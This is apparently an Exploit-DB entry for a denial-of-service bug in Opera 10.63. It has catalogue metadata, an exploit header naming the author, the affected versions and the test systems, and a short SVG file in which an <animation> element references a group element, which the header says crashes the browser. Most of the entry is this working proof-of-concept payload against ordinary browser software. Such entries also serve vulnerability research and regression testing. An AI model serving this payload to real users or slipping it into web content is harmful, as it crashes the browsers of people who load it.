Opera 10.63 - SVG Animation Element Denial of Service
Author: fla
type: dos
platform: multiple
port:
date_added: 2010-10-17
date_updated: 2010-10-17
verified: 1
codes:
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-10-17-at-23322-pm.png
application_url: http://www.exploit-db.comOpera_1063_int_Setup.exe
# Exploit Title: Opera Denial of Service by SVG <animation> Element
# Date: 16, October 2010
# Author: fla
# Software Link: http://www.opera.com/
# Version: 10.63 and previous
# Tested on: Ubuntu 10.10 x64, Windows 7 x64
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" >
<g id="animTest" ></g>
<animation xlink:href="#animTest" />
</svg>